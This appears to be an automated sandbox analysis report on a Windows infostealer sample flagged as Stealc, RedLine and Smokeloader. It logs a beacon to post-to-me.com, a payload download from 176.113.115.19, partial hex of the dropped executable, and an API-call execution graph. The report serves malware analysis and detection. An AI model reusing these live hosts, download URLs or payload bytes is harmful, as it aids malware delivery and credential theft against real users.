Dec 10, 2024 19:00:32.933413029 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:35.385437012 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:40.289489031 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:50.086327076 CET  49725        80         192.168.2.8     176.113.115.19
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 10, 2024 18:58:40.765010118 CET  58736        53         192.168.2.8     1.1.1.1
Dec 10, 2024 18:58:40.991660118 CET  53           58736      1.1.1.1         192.168.2.8
Timestamp                            Source IP    Dest IP      Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Dec 10, 2024 18:58:40.765010118 CET  192.168.2.8  1.1.1.1      0x87f     Standard query (0)  post-to-me.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name            CName  Address         Type            Class        DNS over HTTPS
Dec 10, 2024 18:58:40.991660118 CET  1.1.1.1      192.168.2.8  0x87f     No error (0)  post-to-me.com         172.67.179.207  A (IP address)  IN (0x0001)  false
Dec 10, 2024 18:58:40.991660118 CET  1.1.1.1      192.168.2.8  0x87f     No error (0)  post-to-me.com         104.21.56.70    A (IP address)  IN (0x0001)  false
• post-to-me.com
• 176.113.115.19
• 92.255.57.89
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49725        176.113.115.19  80                1736  C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 18:58:43.210449934 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                  User-Agent: ShareScreen
                                                  Host: 176.113.115.19
                                                  Dec 10, 2024 18:58:44.540997028 CET1236INHTTP/1.1 200 OK
                                                  Date: Tue, 10 Dec 2024 17:58:44 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Last-Modified: Tue, 10 Dec 2024 17:45:01 GMT
                                                  ETag: "4a600-628ee0a60051e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 304640
                                                  Content-Type: application/x-msdos-program
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fa 6d 43 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 24 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 fe 4e 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Yg{{{T{T{TE{:{zt{T{T{T{Rich{PELmCf$?@ BND<@"`.text `.rdata\ "@@.data=0l@.rsrc"@$@@
                                                  Dec 10, 2024 18:58:44.541011095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 00 43 00 3b 0d 04 30 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 90 15 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d
                                                  Data Ascii: %C;0CujhCutu=uCjYeVYEtVPYYE}u7ujYVj5ZCCuCPmYUQeVEPuu/u9Et
                                                  Dec 10, 2024 18:58:44.541018963 CET | 448 | IN | Data Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78
                                                  Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xXCtXCpXClXC5hXC=dXCfXCfXCf`XCf\XCf%XXCf-TXCXCE|XCEXCEXCWCXC|WCpWCt
                                                  Dec 10, 2024 18:58:44.541322947 CET | 1236 | IN | Data Raw: 00 10 00 00 50 ff 15 b8 00 43 00 a3 94 5a 43 00 85 c0 75 02 5d c3 33 c0 40 a3 d0 90 80 00 5d c3 8b ff 56 57 33 f6 bf 98 5a 43 00 83 3c f5 8c 31 43 00 01 75 1e 8d 04 f5 88 31 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 c8 29 00 00 59 59 85 c0 74
                                                  Data Ascii: PCZCu]3@]VW3ZC<1Cu1C8h0)YYtF$|3@_^$1C3SCV1CW>t~tWW&Y2C|1C_t~uP2C|^[UE41CC]jhC3G}39ZC
                                                  Dec 10, 2024 18:58:44.541547060 CET | 224 | IN | Data Raw: ec 51 8d 48 14 51 50 e8 a4 25 00 00 8b 45 08 83 c4 0c ff 0d b8 90 80 00 3b 05 e8 5b 43 00 76 04 83 6d 08 14 a1 bc 90 80 00 a3 c4 90 80 00 8b 45 08 a3 e8 5b 43 00 89 3d cc 90 80 00 5b 5f 5e c9 c3 a1 c8 90 80 00 56 8b 35 b8 90 80 00 57 33 ff 3b f0
                                                  Data Ascii: QHQP%E;[CvmE[C=[_^V5W3;u4kP5W5ZCC;u3x5k5hAj5ZCCF;tjh hWCF;uvW5ZCCN>~
                                                  Dec 10, 2024 18:58:44.541552067 CET | 1236 | IN | Data Raw: ff 05 b8 90 80 00 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04
                                                  Data Ascii: F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWCupU;wC+GAH@PIuUEOHAJHAdD3GFC
                                                  Dec 10, 2024 18:58:44.541563988 CET | 1236 | IN | Data Raw: fb ff ff 59 8b 4b 10 89 01 8b 43 10 83 38 ff 74 e5 89 1d c4 90 80 00 8b 43 10 8b 10 89 55 fc 83 fa ff 74 14 8b 8c 90 c4 00 00 00 8b 7c 90 44 23 4d f8 23 fe 0b cf 75 29 83 65 fc 00 8b 90 c4 00 00 00 8d 48 44 8b 39 23 55 f8 23 fe 0b d7 75 0e ff 45
                                                  Data Ascii: YKC8tCUt|D#M#u)eHD9#U#uEUiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,O
                                                  Dec 10, 2024 18:58:44.541569948 CET | 1236 | IN | Data Raw: 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 3f f1 ff ff 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 3c fd ff ff c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 d4 00
                                                  Data Ascii: rE;PE3uj?Y;uE;t<UWWCu,C`wt_]Uu52Ch]UhC,CthCPXCtu]UuYuCj[YjxYU
                                                  Dec 10, 2024 18:58:44.541575909 CET | 1236 | IN | Data Raw: 00 00 83 c4 14 68 10 20 01 00 68 28 07 43 00 57 e8 64 1f 00 00 83 c4 0c eb 32 6a f4 ff 15 e0 00 43 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd b4 32 43 00 ff 36 e8 d3 21 00 00 59 50 ff 36 53 ff 15 dc 00 43 00 5f 5e 5b c9 c3 6a
                                                  Data Ascii: h h(CWd2jC;t$tjEP42C6!YP6SC_^[j"Ytj"Yu=0Cuh)hYYUE4_C]U54_CYtuYt3@]3]UV5l3C5Ct!h3CtP5l3Ct
                                                  Dec 10, 2024 18:58:44.542485952 CET | 1236 | IN | Data Raw: 57 be 9c 07 43 00 56 ff 15 2c 00 43 00 85 c0 75 07 56 e8 83 f6 ff ff 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 58 00 43 00 68 e8 07 43 00 57 ff d6 68 dc 07 43 00 57 a3 3c 5f 43 00 ff d6 68 d0 07 43 00 57 a3 40 5f 43 00 ff d6 68 c8 07 43 00 57 a3 44
                                                  Data Ascii: WCV,CuVY^5XChCWhCW<_ChCW@_ChCWD_C=<_C5CH_Ct=@_Ct=D_Ctu$C@_CC<_CJ,@5D_CH_CCl3C5@_CP5<_C5@_C<_C5D_C@_
                                                  Dec 10, 2024 18:58:44.660711050 CET | 1236 | IN | Data Raw: eb 1b f7 c1 03 01 00 00 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03 8b 7d 0c 83 65 fc 00 eb 5b
                                                  Data Ascii: t1aw ;MsM9Er'u;v!M}u#EOu }t}e[]]]Guu=t}wu+9uv&yE"tMEjXEEt8Et]}tE`pEEt0}tE`p3[_^U


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.8 | 49726 | 92.255.57.89 | 80 | 1280 | C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 10, 2024 18:58:49.047620058 CET | 87 | OUT | GET / HTTP/1.1
                                                  Host: 92.255.57.89
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.8 | 49724 | 172.67.179.207 | 443 | 1736 | C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-10 17:58:42 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                  User-Agent: ShareScreen
                                                  Host: post-to-me.com
                                                  2024-12-10 17:58:42 UTC | 798 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 10 Dec 2024 17:58:42 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: PHP/5.4.16
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oftJYlceiIcW2OGRv2WXeDUHxFl00oMGBwh20KwcZDnJs33xO8wgqVwXax4lYSgDP0EuUqH4XaygoLAdgCfJQQDmBaPXp0DVqhYAPEbtIIMYgtKafzJK%2FIz9AID9YH22%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eff1fe42fa543d7-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2558&min_rtt=2275&rtt_var=1420&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=642605&cwnd=198&unsent_bytes=0&cid=7318d5b01056c3f7&ts=744&x=0"
                                                  2024-12-10 17:58:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-12-10 17:58:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0



                                                  Target ID: 0
                                                  Start time: 12:58:36
                                                  Start date: 10/12/2024
                                                  Path: C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Users\user\Desktop\ssB9bjDQPf.exe"
                                                  Imagebase: 0x400000
                                                  File size: 430'592 bytes
                                                  MD5 hash: 26CEB3D9DCC1821192B39EEA6832D51D
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Reputation: low
                                                  Has exited: false

                                                  Target ID: 3
                                                  Start time: 12:58:44
                                                  Start date: 10/12/2024
                                                  Path: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe"
                                                  Imagebase: 0x400000
                                                  File size: 304'640 bytes
                                                  MD5 hash: 5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation: low
                                                  Has exited: true

                                                  Target ID: 7
                                                  Start time: 12:59:02
                                                  Start date: 10/12/2024
                                                  Path: C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
                                                  Imagebase: 0x4f0000
                                                  File size: 483'680 bytes
                                                  MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high
                                                  Has exited: true


                                                    Execution Graph

                                                    Execution Coverage: 2.6%
                                                    Dynamic/Decrypted Code Coverage: 3.7%
                                                    Signature Coverage: 5.6%
                                                    Total number of Nodes: 764
                                                    Total number of Limit Nodes: 20
                                                    execution_graph 64999 24f003c 65000 24f0049 64999->65000 65014 24f0e0f SetErrorMode SetErrorMode 65000->65014 65005 24f0265 65006 24f02ce VirtualProtect 65005->65006 65009 24f030b 65006->65009 65007 24f0439 VirtualFree 65012 24f05f4 LoadLibraryA 65007->65012 65013 24f04be 65007->65013 65008 24f04e3 LoadLibraryA 65008->65013 65009->65007 65011 24f08c7 65012->65011 65013->65008 65013->65012 65015 24f0223 65014->65015 65016 24f0d90 65015->65016 65017 24f0dad 65016->65017 65018 24f0dbb GetPEB 65017->65018 65019 24f0238 VirtualAlloc 65017->65019 65018->65019 65019->65005 65020 402c04 InternetOpenW 65021 402e55 65020->65021 65024 402c37 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65020->65024 65041 40f8cf 65021->65041 65023 402e64 65032 42defd 65024->65032 65027 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 65028 402e17 65027->65028 65029 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 65028->65029 65030 402e29 InternetOpenUrlW 65029->65030 65030->65021 65031 402e44 InternetCloseHandle InternetCloseHandle 65030->65031 65031->65021 65033 42df1a 65032->65033 65036 42df0c 65032->65036 65048 42eac9 20 API calls __dosmaperr 65033->65048 65035 42df24 65049 42a59d 26 API calls _Deallocate 65035->65049 65036->65033 65039 42df4a 65036->65039 65038 402e09 65038->65027 65039->65038 65050 42eac9 20 API calls __dosmaperr 65039->65050 65042 40f8d8 65041->65042 65043 40f8da IsProcessorFeaturePresent 65041->65043 65042->65023 65045 40f94d 65043->65045 65051 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65045->65051 65047 40fa30 65047->65023 65048->65035 65049->65038 65050->65035 65051->65047 65052 40fc06 65053 40fc12 BuildCatchObjectHelperInternal 65052->65053 65081 40fff3 65053->65081 65055 40fc19 65056 40fd6c 65055->65056 65059 40fc43 65055->65059 65102 4104d3 4 API calls 2 library calls 65056->65102 65058 40fd73 65103 42ffc9 28 API calls _Atexit 65058->65103 
65070 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65059->65070 65096 42fcee 5 API calls Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 65059->65096 65061 40fd79 65104 42ff7b 28 API calls _Atexit 65061->65104 65064 40fc5c 65066 40fc62 65064->65066 65097 42fc92 5 API calls Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 65064->65097 65065 40fd81 65068 40fce3 65092 4105ed 65068->65092 65070->65068 65098 42a366 167 API calls 3 library calls 65070->65098 65072 40fce9 65073 40fcfe 65072->65073 65099 410623 GetModuleHandleW 65073->65099 65075 40fd05 65075->65058 65076 40fd09 65075->65076 65077 40fd12 65076->65077 65100 42ff6c 28 API calls _Atexit 65076->65100 65101 410182 13 API calls 2 library calls 65077->65101 65080 40fd1a 65080->65066 65082 40fffc 65081->65082 65105 41077b IsProcessorFeaturePresent 65082->65105 65084 410008 65106 428827 10 API calls 3 library calls 65084->65106 65086 41000d 65091 410011 65086->65091 65107 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65086->65107 65088 410028 65088->65055 65089 41001a 65089->65088 65108 428850 8 API calls 3 library calls 65089->65108 65091->65055 65109 426830 65092->65109 65095 410613 65095->65072 65096->65064 65097->65070 65098->65068 65099->65075 65100->65077 65101->65080 65102->65058 65103->65061 65104->65065 65105->65084 65106->65086 65107->65089 65108->65091 65110 410600 GetStartupInfoW 65109->65110 65110->65095 65111 432785 65116 432553 65111->65116 65115 4327ad 65121 43257e 65116->65121 65118 432771 65135 42a59d 26 API calls _Deallocate 65118->65135 65120 4326d0 65120->65115 65128 43d01c 65120->65128 65124 4326c7 65121->65124 65131 43c8ce 170 API calls 2 library calls 65121->65131 65123 432711 65123->65124 65132 43c8ce 170 API calls 2 library calls 65123->65132 65124->65120 65134 42eac9 20 API calls __dosmaperr 65124->65134 65126 432730 65126->65124 65133 43c8ce 
170 API calls 2 library calls 65126->65133 65136 43c9f1 65128->65136 65130 43d037 65130->65115 65131->65123 65132->65126 65133->65124 65134->65118 65135->65120 65137 43c9fd BuildCatchObjectHelperInternal 65136->65137 65138 43ca0b 65137->65138 65140 43ca44 65137->65140 65154 42eac9 20 API calls __dosmaperr 65138->65154 65147 43cfcb 65140->65147 65141 43ca10 65155 42a59d 26 API calls _Deallocate 65141->65155 65146 43ca1a std::_Locinfo::_Locinfo_dtor 65146->65130 65157 43f941 65147->65157 65150 43ca68 65156 43ca91 LeaveCriticalSection __wsopen_s 65150->65156 65154->65141 65155->65146 65156->65146 65158 43f964 65157->65158 65159 43f94d 65157->65159 65161 43f983 65158->65161 65162 43f96c 65158->65162 65234 42eac9 20 API calls __dosmaperr 65159->65234 65238 434faa 10 API calls 2 library calls 65161->65238 65236 42eac9 20 API calls __dosmaperr 65162->65236 65164 43f952 65235 42a59d 26 API calls _Deallocate 65164->65235 65166 43f98a MultiByteToWideChar 65170 43f9b9 65166->65170 65171 43f9a9 GetLastError 65166->65171 65168 43f971 65237 42a59d 26 API calls _Deallocate 65168->65237 65240 4336a7 21 API calls 3 library calls 65170->65240 65239 42ea93 20 API calls 3 library calls 65171->65239 65172 43cfe1 65172->65150 65181 43d03c 65172->65181 65175 43f9c1 65176 43f9e9 65175->65176 65177 43f9c8 MultiByteToWideChar 65175->65177 65178 43346a _free 20 API calls 65176->65178 65177->65176 65179 43f9dd GetLastError 65177->65179 65178->65172 65241 42ea93 20 API calls 3 library calls 65179->65241 65242 43cd9f 65181->65242 65184 43d087 65260 43977e 65184->65260 65185 43d06e 65274 42eab6 20 API calls __dosmaperr 65185->65274 65188 43d073 65275 42eac9 20 API calls __dosmaperr 65188->65275 65189 43d08c 65190 43d095 65189->65190 65191 43d0ac 65189->65191 65276 42eab6 20 API calls __dosmaperr 65190->65276 65273 43cd0a CreateFileW 65191->65273 65195 43d09a 65277 42eac9 20 API calls __dosmaperr 65195->65277 65196 43d162 GetFileType 65199 43d1b4 65196->65199 65200 43d16d GetLastError 
65196->65200 65198 43d137 GetLastError 65279 42ea93 20 API calls 3 library calls 65198->65279 65282 4396c7 21 API calls 3 library calls 65199->65282 65280 42ea93 20 API calls 3 library calls 65200->65280 65201 43d0e5 65201->65196 65201->65198 65278 43cd0a CreateFileW 65201->65278 65205 43d17b CloseHandle 65205->65188 65206 43d1a4 65205->65206 65281 42eac9 20 API calls __dosmaperr 65206->65281 65208 43d12a 65208->65196 65208->65198 65210 43d1d5 65212 43d221 65210->65212 65283 43cf1b 169 API calls 4 library calls 65210->65283 65211 43d1a9 65211->65188 65216 43d24e 65212->65216 65284 43cabd 167 API calls 4 library calls 65212->65284 65215 43d247 65215->65216 65218 43d25f 65215->65218 65285 4335cd 29 API calls 2 library calls 65216->65285 65219 43d009 65218->65219 65220 43d2dd CloseHandle 65218->65220 65228 43346a 65219->65228 65286 43cd0a CreateFileW 65220->65286 65222 43d308 65223 43d312 GetLastError 65222->65223 65224 43d257 65222->65224 65287 42ea93 20 API calls 3 library calls 65223->65287 65224->65219 65226 43d31e 65288 439890 21 API calls 3 library calls 65226->65288 65229 43349e _free 65228->65229 65230 433475 RtlFreeHeap 65228->65230 65229->65150 65230->65229 65231 43348a 65230->65231 65311 42eac9 20 API calls __dosmaperr 65231->65311 65233 433490 GetLastError 65233->65229 65234->65164 65235->65172 65236->65168 65237->65172 65238->65166 65239->65172 65240->65175 65241->65176 65243 43cdc0 65242->65243 65244 43cdda 65242->65244 65243->65244 65296 42eac9 20 API calls __dosmaperr 65243->65296 65289 43cd2f 65244->65289 65247 43cdcf 65297 42a59d 26 API calls _Deallocate 65247->65297 65249 43ce12 65250 43ce41 65249->65250 65298 42eac9 20 API calls __dosmaperr 65249->65298 65258 43ce94 65250->65258 65300 42ffdf 26 API calls 2 library calls 65250->65300 65253 43ce36 65299 42a59d 26 API calls _Deallocate 65253->65299 65254 43ce8f 65255 43cf0e 65254->65255 65254->65258 65301 42a5ca 11 API calls _Atexit 65255->65301 65258->65184 65258->65185 65259 43cf1a 65261 43978a 
BuildCatchObjectHelperInternal 65260->65261 65304 42e3ed EnterCriticalSection 65261->65304 65263 4397d8 65305 439887 65263->65305 65264 4397b6 65308 43955d 21 API calls 3 library calls 65264->65308 65265 439791 65265->65263 65265->65264 65270 439824 EnterCriticalSection 65265->65270 65268 439801 std::_Locinfo::_Locinfo_dtor 65268->65189 65269 4397bb 65269->65263 65309 4396a4 EnterCriticalSection 65269->65309 65270->65263 65271 439831 LeaveCriticalSection 65270->65271 65271->65265 65273->65201 65274->65188 65275->65219 65276->65195 65277->65188 65278->65208 65279->65188 65280->65205 65281->65211 65282->65210 65283->65212 65284->65215 65285->65224 65286->65222 65287->65226 65288->65224 65291 43cd47 65289->65291 65290 43cd62 65290->65249 65291->65290 65302 42eac9 20 API calls __dosmaperr 65291->65302 65293 43cd86 65303 42a59d 26 API calls _Deallocate 65293->65303 65295 43cd91 65295->65249 65296->65247 65297->65244 65298->65253 65299->65250 65300->65254 65301->65259 65302->65293 65303->65295 65304->65265 65310 42e435 LeaveCriticalSection 65305->65310 65307 43988e 65307->65268 65308->65269 65309->65263 65310->65307 65311->65233 65312 43410a 65313 434116 BuildCatchObjectHelperInternal 65312->65313 65314 434122 65313->65314 65315 434139 65313->65315 65346 42eac9 20 API calls __dosmaperr 65314->65346 65325 42caff EnterCriticalSection 65315->65325 65318 434149 65326 434186 65318->65326 65319 434127 65347 42a59d 26 API calls _Deallocate 65319->65347 65322 434155 65348 43417c LeaveCriticalSection __fread_nolock 65322->65348 65324 434132 std::_Locinfo::_Locinfo_dtor 65325->65318 65327 434194 65326->65327 65328 4341ae 65326->65328 65359 42eac9 20 API calls __dosmaperr 65327->65359 65349 432908 65328->65349 65331 434199 65360 42a59d 26 API calls _Deallocate 65331->65360 65332 4341b7 65356 4347d3 65332->65356 65336 4342bb 65338 4342c8 65336->65338 65345 43426e 65336->65345 65337 43423f 65339 43425c 65337->65339 65337->65345 65362 42eac9 20 API calls __dosmaperr 65338->65362 65361 
43449f 31 API calls 4 library calls 65339->65361 65342 434266 65343 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65342->65343 65343->65322 65345->65343 65363 43431b 30 API calls 2 library calls 65345->65363 65346->65319 65347->65324 65348->65324 65350 432914 65349->65350 65351 432929 65349->65351 65364 42eac9 20 API calls __dosmaperr 65350->65364 65351->65332 65353 432919 65365 42a59d 26 API calls _Deallocate 65353->65365 65355 432924 65355->65332 65366 434650 65356->65366 65358 4341d3 65358->65336 65358->65337 65358->65343 65359->65331 65360->65343 65361->65342 65362->65343 65363->65343 65364->65353 65365->65355 65367 43465c BuildCatchObjectHelperInternal 65366->65367 65368 434664 65367->65368 65369 43467c 65367->65369 65401 42eab6 20 API calls __dosmaperr 65368->65401 65370 434730 65369->65370 65375 4346b4 65369->65375 65406 42eab6 20 API calls __dosmaperr 65370->65406 65373 434669 65402 42eac9 20 API calls __dosmaperr 65373->65402 65374 434735 65407 42eac9 20 API calls __dosmaperr 65374->65407 65391 4396a4 EnterCriticalSection 65375->65391 65379 434671 std::_Locinfo::_Locinfo_dtor 65379->65358 65380 43473d 65408 42a59d 26 API calls _Deallocate 65380->65408 65381 4346ba 65383 4346f3 65381->65383 65384 4346de 65381->65384 65392 434755 65383->65392 65403 42eac9 20 API calls __dosmaperr 65384->65403 65387 4346e3 65404 42eab6 20 API calls __dosmaperr 65387->65404 65389 4346ee 65405 434728 LeaveCriticalSection __wsopen_s 65389->65405 65391->65381 65409 439921 65392->65409 65394 434767 65395 434780 SetFilePointerEx 65394->65395 65396 43476f 65394->65396 65398 434774 65395->65398 65399 434798 GetLastError 65395->65399 65422 42eac9 20 API calls __dosmaperr 65396->65422 65398->65389 65423 42ea93 20 API calls 3 library calls 65399->65423 65401->65373 65402->65379 65403->65387 65404->65389 65405->65379 65406->65374 65407->65380 65408->65379 65410 43992e 65409->65410 65413 439943 65409->65413 65424 42eab6 20 API calls __dosmaperr 65410->65424 65412 439933 65425 42eac9 
